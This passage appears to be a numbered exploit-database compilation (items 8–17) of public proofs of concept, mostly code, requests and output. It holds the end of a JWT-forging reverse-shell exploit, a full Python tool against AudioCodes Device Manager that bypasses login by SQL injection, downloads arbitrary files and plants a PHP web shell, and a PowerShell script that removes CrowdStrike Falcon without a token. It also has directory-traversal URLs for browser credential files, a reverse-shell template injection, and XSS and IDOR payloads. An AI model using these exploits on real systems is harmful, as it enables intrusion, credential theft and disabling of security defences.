    parser.add_argument("os", help="Operating System of the target", choices=["windows", "linux"])
    parser.add_argument("lhost", help="IP of the machine that will receive the reverse shell")
    parser.add_argument("lport", help="Port of the machine that will receive the reverse shell")
    args = parser.parse_args()
    IP_TARGET = urlparse(args.target).hostname

    print("[*] Getting the admin info")
    sacrificial_token = craft_jwt("xThaz")
    roles = request_api("get", sacrificial_token, "roles").json()
    admin_username, admin_id = get_id_admin(sacrificial_token, roles)
    impersonate_token = craft_jwt(admin_username, admin_id)
    print(f"\t[*] Impersonated {[admin_username]} with the id {[admin_id]}")

    print("[*] Generating payload")
    dll_encoded = compile_payload()
    wrapper = generate_wrapper(dll_encoded)

    print("[*] Uploading malicious listener profile")
    profile_id = upload_profile(impersonate_token, wrapper)

    print("[*] Generating listener")
    listener_id, listener_port = generate_listener(impersonate_token, profile_id)

    print("[*] Triggering the exploit")
    aes_key, guid_prefix = get_grunt_config(impersonate_token, listener_id)
    trigger_exploit(listener_port, aes_key, f"{guid_prefix}{random_hex(10)}")
```
  8. # Exploit Title: Virtual Reception v1.0 - Web Server Directory Traversal
# Exploit Author: Spinae
# Vendor Homepage: https://www.virtualreception.nl/
# Version: win7sp1_rtm.101119-1850 6.1.7601.1.0.65792 running on an Intel NUC5i5RY
# Tested on: all
# CVE-ID: CVE-2023-25289

We discovered the web server of the Virtual Reception appliance is prone to an unauthenticated directory traversal vulnerability. This allows an attacker to traverse outside the server root directory by specifying files at the end of a URL request.

This is a NUC5i5RY:

http://[ip address]/c:/WINDOWS/System32/drivers/etc/hosts
http://[ip address]/C:/windows/WindowsUpdate.log
...

A user called 'receptie' exists on the Windows system:

http://[ip address]/c:/users/receptie/ntuser.dat
http://[ip address]/c:/users/receptie/ntuser.ini
http://[ip address]/c:/users/receptie/appdata/local/temp/wmsetup.log
...
http://[ip address]/c:/users/receptie/AppData/Local/Google/Chrome/User Data/Default/Login Data
http://[ip address]/c:/users/receptie/AppData/Local/Google/Chrome/User%20Data/Local%20State
http://[ip address]/c:/users/receptie/AppData/Local/Google/Chrome/User Data/Default/Cookies
...

The appliance also keeps a log of the visitors that register at the entrance:

http://[ip address]/visitors.csv

hash icon for shodan searches: https://www.shodan.io/search?query=http.favicon.hash%3A656388049

No reply from the vendor (phone, email, website form submissions), first reported in 2021.
  9. # Exploit Title: Lavasoft web companion 4.1.0.409 - 'DCIservice' Unquoted Service Path
# Author: P4p4 M4n3
# Discovery Date: 25-11-2022
# Vendor Homepage: https://webcompanion.com/en/
# Version 4.1.0.409
# Tested on: Microsoft Windows Server 2019 Datacenter x64
# Description:
# Lavasoft 4.1.0.409 installs DCIservice as a service with an unquoted service path
# POC https://youtu.be/yb8AavCMbes

# Discover the Unquoted Service path

```
C:\Users\p4p4\> wmic service get name,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
DCIService    C:\Program Files (x86)\Lavasoft\Web Companion\Service\x64\DCIService.exe    Auto

C:\Users\p4p4> sc qc DCIService
[SC] QueryServiceConfig réussite(s)

SERVICE_NAME: DCIService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Lavasoft\Web Companion\Service\x64\DCIService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : DCIService
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
```
10. ## Exploit Title: Concrete5 CME v9.1.3 - Xpath injection
## Author: nu11secur1ty
## Date: 11.28.2022
## Vendor: https://www.concretecms.org/
## Software: https://www.concretecms.org/download
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3

## Description:
The URL path folder `3` appears to be vulnerable to XPath injection attacks. The test payload 50539478' or 4591=4591-- was submitted in the URL path folder `3`, and an XPath error message was returned. The attacker can flood the system with requests by using this vulnerability until he receives the actual paths of all the content of this system, which is stored on some internal or external server.

## STATUS: HIGH Vulnerability

[+] Exploits:

00:
```http
GET /concrete-cms-9.1.3/index.php/ccm50539478'%20or%204591%3d4591--%20/assets/localization/moment/js HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
```

[+] Response:
```http
HTTP/1.1 500 Internal Server Error
Date: Mon, 28 Nov 2022 15:32:22 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
X-Powered-By: PHP/7.4.30
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 592153

<!DOCTYPE html><!-- Whoops\Exception\ErrorException: include(): Failed opening 'C:/xampp/htdocs/pwnedhost/concrete-cms-9.1.3/application/files/cache/expensive\0fea6a13c52b4d47\25368f24b045ca84\38a865804f8fdcb6\57cd99682e939275\3e7d68124ace5663\5a578007c2573b03\d35376a9b3047dec\fee81596e3895419.php' for inclusion (include_path='C:/xampp/htdocs/pwnedhost/concrete-cms-9.1.3/concrete/vendor;C:\xampp\php\PEAR') in file C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php on line 26
Stack trace:
 1. Whoops\Exception\ErrorException->() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php:26
 2. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php:26
 3. Stash\Driver\FileSystem\NativeEncoder->deserialize() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem.php:201
 4. Stash\Driver\FileSystem->getData() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:631
 5. Stash\Item->getRecord() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:321
 6. Stash\Item->executeGet() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:252
 7. Stash\Item->get() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:346
 8. Stash\Item->isMiss() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Cache\Adapter\LaminasCacheDriver.php:67
 9. Concrete\Core\Cache\Adapter\LaminasCacheDriver->internalGetItem() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-cache\src\Storage\Adapter\AbstractAdapter.php:356
10. Laminas\Cache\Storage\Adapter\AbstractAdapter->getItem() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-i18n\src\Translator\Translator.php:601
11. Laminas\I18n\Translator\Translator->loadMessages() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-i18n\src\Translator\Translator.php:434
12. Laminas\I18n\Translator\Translator->getTranslatedMessage() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-i18n\src\Translator\Translator.php:349
13. Laminas\I18n\Translator\Translator->translate() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Localization\Translator\Adapter\Laminas\TranslatorAdapter.php:69
14. Concrete\Core\Localization\Translator\Adapter\Laminas\TranslatorAdapter->translate() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\bootstrap\helpers.php:27
15. t() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\blocks\top_navigation_bar\view.php:47
16. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Block\View\BlockView.php:267
17. Concrete\Core\Block\View\BlockView->renderViewContents() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\AbstractView.php:164
18. Concrete\Core\View\AbstractView->render() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Area\Area.php:853
19. Concrete\Core\Area\Area->display() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Area\GlobalArea.php:128
20. Concrete\Core\Area\GlobalArea->display() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\themes\atomik\elements\header.php:11
21. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\View.php:125
22. Concrete\Core\View\View->inc() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\themes\atomik\view.php:4
23. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\View.php:329
24. Concrete\Core\View\View->renderTemplate() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\View.php:291
25. Concrete\Core\View\View->renderViewContents() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\AbstractView.php:164
26. Concrete\Core\View\AbstractView->render() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\controllers\single_page\page_not_found.php:19
27. Concrete\Controller\SinglePage\PageNotFound->view() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Controller\AbstractController.php:318
28. call_user_func_array() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Controller\AbstractController.php:318
29. Concrete\Core\Controller\AbstractController->runAction() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:188
30. Concrete\Core\Http\ResponseFactory->controller() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:95
31. Concrete\Core\Http\ResponseFactory->notFound() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:390
32. Concrete\Core\Http\ResponseFactory->collectionNotFound() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:234
33. Concrete\Core\Http\ResponseFactory->collection() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\DefaultDispatcher.php:132
34. Concrete\Core\Http\DefaultDispatcher->handleDispatch() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\DefaultDispatcher.php:60
35. Concrete\Core\Http\DefaultDispatcher->dispatch() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\DispatcherDelegate.php:39
36. Concrete\Core\Http\Middleware\DispatcherDelegate->next() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\FrameOptionsMiddleware.php:39
37. Concrete\Core\Http\Middleware\FrameOptionsMiddleware->process() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50
38. Concrete\Core\Http\Middleware\MiddlewareDelegate->next() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\StrictTransportSecurityMiddleware.php:36
39. Concrete\Core\Http\Middleware\StrictTransportSecurityMiddleware->process() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50
40. Concrete\Core\Http\Middleware\MiddlewareDelegate->next() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\ContentSecurityPolicyMiddleware.php:36
41. Concrete\Core\Http\Middleware\ContentSecurityPolicyMiddleware->process() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50
42. Concrete\Core\Http\Middleware\MiddlewareDelegate->next() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\CookieMiddleware.php:35
43. Concrete\Core\Http\Middleware\CookieMiddleware->process() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50
44. Concrete\Core\Http\Middleware\MiddlewareDelegate->next() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\ApplicationMiddleware.php:29
45. Concrete\Core\Http\Middleware\ApplicationMiddleware->process() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50
46. Concrete\Core\Http\Middleware\MiddlewareDelegate->next() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareStack.php:86
47. Concrete\Core\Http\Middleware\MiddlewareStack->process() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\DefaultServer.php:85
48. Concrete\Core\Http\DefaultServer->handleRequest() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Foundation\Runtime\Run\DefaultRunner.php:125
49. Concrete\Core\Foundation\Runtime\Run\DefaultRunner->run() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Foundation\Runtime\DefaultRuntime.php:102
50. Concrete\Core\Foundation\Runtime\DefaultRuntime->run() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\dispatcher.php:45
51. require() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\index.php:2
--><html>
<head>
<meta charset="utf-8">
<meta name="robots" content="noindex,nofollow"/>
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"/>
<title>Concrete CMS has encountered an issue.</title>
<style>
body { font: 12px "Helvetica Neue", helvetica, arial, sans-serif; color: #131313; background: #eeeeee; padding:0; margin: 0; max-height: 100%; text-rendering: optimizeLegibility; }
a { text-decoration: none; }
.Whoops.container { position: relative; z-index: 9999999999; }
.panel { overflow-y: scroll; height: 100%; position: fixed; margin: 0; left: 0; top: 0; }
.branding { position: absolute; top: 10px; right: 20px; color: #777777; font-size: 10px; z-index: 100; }
.branding a { color: #e95353; }
header { color: white; box-sizing: border-box; background-color: #2a2a2a; padding: 35px 40px; max-height: 180px; overflow: hidden; transition: 0.5s; }
header.header-expand { max-height: 1000px; }
.exc-title { margin: 0; color: #bebebe; font-size: 14px; }
.exc-title-primary, .exc-title-secondary { color: #e95353; }
.exc-message { font-size: 20px; word-wrap: break-word; margin: 4px 0 0 0; color: white; }
.exc-message span { display: block; }
.exc-message-empty-notice { color: #a29d9d; font-weight: 300; }
.......
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3)

## Proof and Exploit:
[href](https://streamable.com/4f60ka)

## Time spent
`03:00:00`

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
11. # Exploit Title: Device Manager Express 7.8.20002.47752 - Remote Code Execution (RCE)
# Date: 02-12-22
# Exploit Author: 0xEF
# Vendor Homepage: https://www.audiocodes.com
# Software Link: https://ln5.sync.com/dl/82774fdd0/jwqwt632-s65tncqu-iwrtm7g3-iidti637
# Version: <= 7.8.20002.47752
# Tested on: Windows 10 & Windows Server 2019
# Default credentials: admin/admin
# SQL injection + Path traversal + Remote Command Execution
# CVE: CVE-2022-24627, CVE-2022-24629, CVE-2022-24630, CVE-2022-24632

```python
#!/usr/bin/python3
import requests
import sys
import time
import re
import colorama
from colorama import Fore, Style
import uuid

headers = {'Content-Type': 'application/x-www-form-urlencoded'}


def menu():
    print('-----------------------------------------------------------------------\n'
          'AudioCodes Device Manager Express 45 78 70 6C 6F 69 74 \n'
          '-----------------------------------------------------------------------')


def optionlist(s, target):
    try:
        print('\nOptions: (Press any other key to quit)\n'
              '-----------------------------------------------------------------------\n'
              '1: Upload arbitrary file\n'
              '2: Download arbitrary file\n'
              '3: Execute command\n'
              '4: Add backdoor\n'
              '-----------------------------------------------------------------------')
        option = int(input('Select: '))
        if option == 1:
            t = 'a'
            upload_file(s, target, t)
        elif option == 2:
            download_file(s, target)
        elif option == 3:
            execute(s, target)
        elif option == 4:
            t = 'b'
            upload_file(s, target, t)
    except Exception:
        sys.exit()


def bypass_auth(target):
    try:
        print('\nTrying to bypass authentication..\n')
        url = f'http://{target}/admin/AudioCodes_files/process_login.php'
        s = requests.Session()
        # CVE-2022-24627
        payload_list = ['\'or 1=1#', '\\\'or 1=1#', 'admin']
        for payload in payload_list:
            body = {'username': 'admin', 'password': '', 'domain': '', 'p': payload}
            r = s.post(url, data=body)
            if 'Configuration' in r.text:
                print(f'{Fore.GREEN}(+) Authenticated as Administrator on: {target}{Style.RESET_ALL}')
                time.sleep(1)
                return s
        else:
            # none of the payloads worked
            print(f'{Fore.RED}(-) Computer says no, can\'t login, try again..{Style.RESET_ALL}')
            main()
    except Exception:
        sys.exit()


def upload_file(s, target, t):
    try:
        url = f'http://{target}/admin/AudioCodes_files/BrowseFiles.php?type='
        param = uuid.uuid4().hex
        file = input('\nEnter file name: ')
        # read extension
        ext = file.rsplit(".", 1)[1]
        if t == 'b':
            # remove extension
            file = file.rsplit(".", 1)[0] + '.php'
            ext = 'php'
        patch = '1'
        if file != '':
            if patch_ext(s, target, patch, ext):  # CVE-2022-24629
                print(f'{Fore.GREEN}(+) Success{Style.RESET_ALL}')
                if t == 'a':
                    dest = input('\nEnter destination location (ex. c:\\): ')
                    print(f'\nUploading file to {target}: {dest}{file}')
                    files = {'myfile': (file, open(file, 'rb'), 'text/html')}
                    body = {'dir': f'{dest}', 'type': '', 'Submit': 'Upload'}
                    r = s.post(url, files=files, data=body)
                    print(f'{Fore.GREEN}(+) Done{Style.RESET_ALL}')
                if t == 'b':
                    shell = f'<?php echo shell_exec($_GET[\'{param}\']); ?>'
                    files = {'myfile': (file, shell, 'text/html')}
                    body = {'dir': 'C:/audiocodes/express/WebAdmin/region/', 'type': '', 'Submit': 'Upload'}
                    r = s.post(url, files=files, data=body)
                    print('\nBackdoor location:')
                    print(f'{Fore.GREEN}(+) http://{target}/region/{file}?{param}=dir{Style.RESET_ALL}')
                patch = '2'
                time.sleep(1)
                patch_ext(s, target, patch, ext)
            else:
                print(f'{Fore.RED}(-) Could not whitelist extension {ext}.. Try something else\n{Style.RESET_ALL}')
    except Exception:
        print(f'{Fore.RED}(-) Computer says no..{Style.RESET_ALL}')
        patch = '2'
        patch_ext(s, target, patch, ext)


def download_file(s, target):
    # CVE-2022-24632
    try:
        file = input('\nFull path to file, eg. c:\\windows\\win.ini: ')
        if file != '':
            url = f'http://{target}/admin/AudioCodes_files/BrowseFiles.php?view={file}'
            r = s.get(url)
            if len(r.content) > 0:
                print(f'{Fore.GREEN}\n(+) File {file} downloaded\n{Style.RESET_ALL}')
                file = str(file).split('\\')[-1:][0]
                open(file, 'wb').write(r.content)
            else:
                print(f'{Fore.RED}\n(-) File not found..\n{Style.RESET_ALL}')
        else:
            print(f'{Fore.RED}\n(-) Computer says no..\n{Style.RESET_ALL}')
    except Exception:
        sys.exit()


def execute(s, target):
    try:
        while True:
            # CVE-2022-24631
            command = input('\nEnter a command: ')
            if command == '':
                optionlist(s, target)
                break
            print(f'{Fore.GREEN}(+) Executing: {command}{Style.RESET_ALL}')
            body = 'ssh_command=' + command
            url = f'http://{target}/admin/AudioCodes_files/BrowseFiles.php?cmd=ssh'
            r = s.post(url, data=body, headers=headers)
            print('-----------------------------------------------------------------------')
            time.sleep(1)
            print((", ".join(re.findall(r'</form>(.+?)</section>', str(r.content)))).replace('\\r\\n', '').replace('</div>', '').replace('<div>', '').replace('</DIV>', '').replace('<DIV>', '').replace('<br/>', '').lstrip())
            print('-----------------------------------------------------------------------')
    except Exception:
        sys.exit()


def patch_ext(s, target, opt, ext):
    try:
        if opt == '1':
            print('\nTrying to add extension to whitelist..')
            body = {'action': 'saveext', 'extensions': f'.cab,.cfg,.csv,.id,.img,.{ext},.zip'}
        if opt == '2':
            print('\nCleaning up..')
            body = {'action': 'saveext', 'extensions': '.cab,.cfg,.csv,.id,.img,.zip'}
            print(f'{Fore.GREEN}(+) {ext.upper()} extension removed\n{Style.RESET_ALL}')
        url = f'http://{target}/admin/AudioCodes_files/ajax/ajaxGlobalSettings.php'
        r = s.post(url, data=body, headers=headers)
        time.sleep(1)
        if f'{ext}' in r.text:
            return True
    except Exception:
        sys.exit()


def main():
    if len(sys.argv) != 2:
        print(' Usage: ' + sys.argv[0] + ' <target IP>')
        print(' Example: ' + sys.argv[0] + ' 172.16.86.154')
        sys.exit(1)
    target = sys.argv[1]
    menu()
    s = bypass_auth(target)
    if s:
        optionlist(s, target)


if __name__ == '__main__':
    main()

# Timeline
# 11-11-2021 Vulnerabilities discovered
# 12-11-2021 PoC written
# 15-11-2021 Details shared with vendor
# 02-12-2021 Vendor confirmed vulnerabilities
# 03-12-2021 CVE's requested
# 09-12-2021 Vendor replied with solution and notified customers
# 07-02-2022 Product EOL announced
# 10-03-2022 CVE's assigned
# 02-12-2022 Disclosure of findings
```
12. # Exploit Title: CrowdStrike Falcon AGENT 6.44.15806 - Uninstall without Installation Token
# Date: 30/11/2022
# Exploit Author: Walter Oberacher, Raffaele Nacca, Davide Bianchin, Fortunato Lodari, Luca Bernardi (Deda Cloud Cybersecurity Team)
# Vendor Homepage: https://www.crowdstrike.com/
# Author Homepage: https://www.deda.cloud/
# Tested On: All Windows versions
# Version: 6.44.15806
# CVE: Based on CVE-2022-2841; Modified by Deda Cloud Purple Team members, to exploit hotfixed release. Publication of CVE-2022-44721 in progress.

```powershell
# Locate the Falcon sensor's uninstall GUID in the Uninstall registry hive
$InstalledSoftware = Get-ChildItem "HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall"
foreach ($obj in $InstalledSoftware) {
    if ("CrowdStrike Sensor Platform" -eq $obj.GetValue('DisplayName')) {
        $uninstall_uuid = $obj.Name.Split("\")[6]
    }
}

$g_msiexec_instances = New-Object System.Collections.ArrayList

Write-Host "[+] Identified installed Falcon: $uninstall_uuid"
Write-Host "[+] Running uninstaller for Crowdstrike Falcon . . ."
Start-Process "msiexec" -ArgumentList "/X$uninstall_uuid"

while ($true) {
    if (Get-Process -Name "CSFalconService" -ErrorAction SilentlyContinue) {
        # Track every msiexec instance spawned by the uninstall and kill the 4th/5th one
        Get-Process | Where-Object { $_.Name -eq "msiexec" } | ForEach-Object {
            if (-Not $g_msiexec_instances.Contains($_.Id)) {
                $g_msiexec_instances.Add($_.Id)
                if (4 -eq $g_msiexec_instances.Count -or 5 -eq $g_msiexec_instances.Count) {
                    Start-Sleep -Milliseconds 100
                    Write-Host "[+] Killing PID $($g_msiexec_instances[-1])"
                    Stop-Process -Force -Id $g_msiexec_instances[-1]
                }
            }
        }
    } else {
        Write-Host "[+] CSFalconService process vanished...reboot and have fun!"
        break
    }
}
```
13. # Exploit Title: 4images 1.9 - Remote Command Execution (RCE)
# Exploit Author: Andrey Stoykov
# Software Link: https://www.4homepages.de/download-4images
# Version: 1.9
# Tested on: Ubuntu 20.04

To reproduce do the following:

1. Login as administrator user
2. Browse to "General" -> "Edit Templates" -> "Select Template Pack" -> "default_960px" -> "Load Theme"
3. Select Template "categories.html"
4. Paste reverse shell code
5. Click "Save Changes"
6. Browse to "http://host/4images/categories.php?cat_id=1"

```http
// HTTP POST request showing reverse shell payload
POST /4images/admin/templates.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
[...]

__csrf=c39b7dea0ff15442681362d2a583c7a9&action=savetemplate&content=[REVERSE_SHELL_CODE]&template_file_name=categories.html&template_folder=default_960px[...]

// HTTP redirect response to specific template
GET /4images/categories.php?cat_id=1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
[...]
```

```
# nc -kvlp 4444
listening on [any] 4444 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 43032
Linux kali 6.0.0-kali3-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.0.7-1kali1 (2022-11-07) x86_64 GNU/Linux
 13:54:28 up  2:18,  2 users,  load average: 0.09, 0.68, 0.56
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
kali     tty7     :0               11:58    2:18m  2:21   0.48s xfce4-session
kali     pts/1    -                11:58    1:40  24.60s  0.14s sudo su
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$ 
```
14. # Exploit Title: LISTSERV 17 - Reflected Cross Site Scripting (XSS)
# Google Dork: inurl:/scripts/wa.exe
# Date: 12/01/2022
# Exploit Author: Shaunt Der-Grigorian
# Vendor Homepage: https://www.lsoft.com/
# Software Link: https://www.lsoft.com/download/listserv.asp
# Version: 17
# Tested on: Windows Server 2019
# CVE : CVE-2022-39195

A reflected cross-site scripting (XSS) vulnerability in the LISTSERV 17 web interface allows remote attackers to inject arbitrary JavaScript or HTML via the "c" parameter.

To reproduce, please visit http://localhost/scripts/wa.exe?TICKET=test&c=%3Cscript%3Ealert(1)%3C/script%3E (or whichever URL you can use for testing instead of localhost). The "c" parameter will reflect any value given onto the page.

# Solution
This vulnerability can be mitigated by going under "Server Administration" to "Web Templates" and editing the BODY-LCMD-MESSAGE web template. Change &+CMD; to &+HTMLENCODE(&+CMD;); .
15. # Exploit Title: LISTSERV 17 - Insecure Direct Object Reference (IDOR)
# Google Dork: inurl:/scripts/wa.exe
# Date: 12/02/2022
# Exploit Author: Shaunt Der-Grigorian
# Vendor Homepage: https://www.lsoft.com/
# Software Link: https://www.lsoft.com/download/listserv.asp
# Version: 17
# Tested on: Windows Server 2019
# CVE : CVE-2022-40319

# Steps to replicate
1. Create two accounts on your LISTSERV 17 installation, logging into each one in a different browser or container.
2. Intercept your attacking profile's browser traffic using Burp.
3. When logging in, you'll be taken to a URL with your email address in the Y parameter (i.e. http://example.com/scripts/wa.exe?INDEX&X=[session-id]&Y=[email-address]).
4. Click on your email address on the top right and select "Edit profile".
5. In Burp, change the email address in the URL's Y parameter to the email address of your victim account.
6. Next, the "WALOGIN" cookie value will be an ASCII encoded version of your email address. Using Burp Decoder, ASCII encode your victim's email address and replace the "WALOGIN" cookie value with that.
7. Submit this request. You should now be accessing/editing the victim's profile. You can make modifications and access any information in this profile as long as you replace those two values in Burp for each request.
16. # Exploit Title: WPForms 1.7.8 - Cross-Site Scripting (XSS)
# Date: 2022-12-05
# Author: Milad karimi
# Software Link: https://wordpress.org/plugins/wpforms-lite
# Version: 1.7.8
# Tested on: Windows 10
# CVE: N/A

1. Description:
This plugin creates a WPForms from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.

2. Proof of Concept:
https://$target/ListTable.php?foobar=<script>alert("Ex3ptionaL")</script>
17. # Exploit Title: Shoplazza 1.1 - Stored Cross-Site Scripting (XSS)
# Exploit Author: Andrey Stoykov
# Software Link: https://github.com/Shoplazza/LifeStyle
# Version: 1.1
# Tested on: Ubuntu 20.04

Stored XSS #1:

To reproduce do the following:

1. Login as normal user account
2. Browse "Blog Posts" -> "Manage Blogs" -> "Add Blog Post"
3. Select "Title" and enter payload "><script>alert(1)</script>

```http
// HTTP POST request showing XSS payload
PATCH /admin/api/admin/articles/2dc688b1-ac9e-46d7-8e56-57ded1d45bf5 HTTP/1.1
Host: test1205.myshoplaza.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
[...]

{"article":{"id":"2dc688b1-ac9e-46d7-8e56-57ded1d45bf5","title":"Title\"><script>alert(1)</script>","excerpt":"Excerpt\"><script>alert(2)</script>","content":"<p>\"><script>alert(3)</script></p>"[...]

// HTTP response showing unsanitized XSS payload
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
[...]

{"article":{"title":"Title\"><script>alert(1)</script>","excerpt":"Excerpt\"><script>alert(2)</script>","published":true,"seo_title":"Title\"><script>alert(1)</script>"[...]

// HTTP GET request to trigger XSS payload
GET /blog/titlescriptalert1script?st=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2NzAzMzE5MzYsInN0b3JlX2lkIjo1MTA0NTksInVzZXJfaWQiOiI4NGY4Nzk4ZC03ZGQ1LTRlZGMtYjk3Yy02MWUwODk5ZjM2MDgifQ.9ybPJCtv6Lzf1BlDy-ipoGpXajtl75QdUKEnfj9L49I HTTP/1.1
Host: test1205.myshoplaza.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
[...]

// HTTP response showing unsanitized XSS payload
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
[...]

